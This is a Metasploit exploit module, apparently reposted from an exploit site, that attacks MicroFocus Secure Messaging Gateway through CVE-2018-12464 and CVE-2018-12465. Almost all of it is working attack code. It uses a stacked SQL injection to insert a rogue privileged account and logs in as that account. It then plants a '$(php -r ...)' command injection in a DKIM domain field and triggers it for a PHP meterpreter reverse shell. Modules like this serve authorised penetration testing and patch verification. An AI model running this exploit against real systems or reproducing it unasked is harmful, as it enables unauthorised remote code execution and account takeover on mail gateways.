### This module requires Metasploit: https://metasploit.com/download# Curren

1. ##
2. # This module requires Metasploit: https://metasploit.com/download
3. # Current source: https://github.com/rapid7/metasploit-framework
4. ##
5.  
6. class MetasploitModule < Msf::Exploit::Remote
7. Rank = ExcellentRanking
8.  
9. include Msf::Exploit::Remote::HttpClient
10.  
11. def initialize(info={})
12. super(update_info(info,
13. 'Name' => "MicroFocus Secure Messaging Gateway Remote Code Execution",
14. 'Description' => %q{
15. This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway.
16. An unauthenticated user can execute a terminal command under the context of the web user.
17.  
18. One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
19. which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system.
20. manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
21. to access this endpoint without having a valid session.
22.  
23. Combining these vulnerabilities gives the opportunity execute operation system commands under the context
24. of the web user.
25. },
26. 'License' => MSF_LICENSE,
27. 'Author' =>
28. [
29. 'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
30. ],
31. 'References' =>
32. [
33. ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
34. ['CVE', '2018-12464'],
35. ['CVE', '2018-12465'],
36. ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
37. ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
38. ],
39. 'DefaultOptions' =>
40. {
41. 'Payload' => 'php/meterpreter/reverse_tcp',
42. 'Encoder' => 'php/base64'
43. },
44. 'Platform' => ['php'],
45. 'Arch' => ARCH_PHP,
46. 'Targets' => [[ 'Automatic', { }]],
47. 'Privileged' => false,
48. 'DisclosureDate' => "Jun 19 2018",
49. 'DefaultTarget' => 0
50. ))
51.  
52. register_options(
53. [
54. OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
55. ]
56. )
57. end
58.  
59. def execute_query(query)
60. #
61. # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques
62. # but since we are able to use stacked-query approach, following form of payload is required in order to be able
63. # get back the output of query !
64. #
65. r = rand_text_alphanumeric(3 + rand(3))
66. sql = r
67. sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine "
68. sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine "
69. sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; "
70. sql << query
71. sql << "; -- "
72. sql << r
73.  
74. send_request_cgi(
75. 'method' => 'POST',
76. 'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
77. 'vars_post' => {
78. 'appkey' => r
79. }
80. )
81.  
82. end
83.  
84. def something_went_wrong
85. fail_with Failure::Unknown, 'Something went wrong'
86. end
87.  
88. def check
89. r = rand_text_numeric(15..35)
90. res = execute_query("SELECT #{r}")
91. unless res
92. vprint_error 'Connection failed'
93. return CheckCode::Unknown
94. end
95. unless res.code == 200 && res.body.include?(r)
96. return CheckCode::Safe
97. end
98. CheckCode::Vulnerable
99. end
100.  
101. def implant_payload(cookie)
102. print_status('Creating a domain record with a malformed DKIM data')
103. p = [
104. {
105. :id => 'temp_0',
106. :Description => rand_text_alpha(5),
107. :DkimList => [
108. {
109. :Domain => "$(php -r '#{payload.encoded}')",
110. :Selector => '',
111. :TempId => 'tempDkim_1'
112. }
113. ]
114. }
115. ].to_json
116. res = send_request_cgi({
117. 'method' => 'POST',
118. 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'),
119. 'cookie' => cookie,
120. 'vars_get' => {
121. 'cache' => 0,
122. },
123. 'vars_post' => {
124. 'StateData' => '[{"ouid":1}]',
125. 'SaveData' => p
126. }
127. })
128.  
129. if res && res.code == 200 && res.body.include?('DbNodeId')
130. # Defining as global variable since we need to access them later within clean up function.
131. begin
132. @domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
133. @dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
134. rescue => e
135. fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
136. end
137. print_good('Payload is successfully implanted')
138. else
139. something_went_wrong
140. end
141. end
142.  
143. def create_user
144. # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection
145. # issue location where requires a valid session !
146. print_status('Creating a user with appropriate privileges')
147.  
148. # Defining as global variable since we need to access them later within clean up function.
149. @username = rand_text_alpha_lower(5..25)
150. @userid = rand_text_numeric(6..8)
151. query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"
152.  
153. execute_query(query)
154. res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")
155.  
156. if res && res.code == 200 && res.body.include?(@username)
157. print_good("User successfully created. Username : #{@username}")
158. else
159. something_went_wrong
160. end
161. end
162.  
163. def login
164. print_status("Authenticating with created user")
165. res = send_request_cgi(
166. 'method' => 'POST',
167. 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'),
168. 'vars_post' => {
169. 'username' => @username,
170. 'password' => rand_text_alpha_lower(5..25),
171. 'passwordmandatory' => rand_text_alpha_lower(5..25),
172. 'LimitInterfaceId' => 1
173. }
174. )
175. if res && res.code == 200 && res.body.include?('/ui/default/index.php')
176. print_good('Successfully authenticated')
177. cookie = res.get_cookies
178. else
179. something_went_wrong
180. end
181. cookie
182. end
183.  
184. def exploit
185. unless check == CheckCode::Vulnerable
186. fail_with Failure::NotVulnerable, 'Target is not vulnerable'
187. end
188.  
189. create_user
190. cookie = login
191. implant_payload(cookie)
192.  
193. print_status('Triggering an implanted payload')
194. send_request_cgi({
195. 'method' => 'POST',
196. 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
197. 'cookie' => cookie,
198. 'vars_get' => {
199. 'cache' => 0,
200. },
201. 'vars_post' => {
202. 'DkimRecordId' => @dkimid
203. }
204. })
205.  
206. end
207.  
208. def on_new_session(session)
209. print_status('Cleaning up...')
210. cmd = ""
211. cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "'
212. cmd << "DELETE FROM account WHERE loginname ='#{@username}';"
213. cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};"
214. cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};"
215. cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};"
216. cmd << '"'
217. session.shell_command_token(cmd)
218. end
219.  
220. end
221.  
222. # 0day.today [2018-07-26] #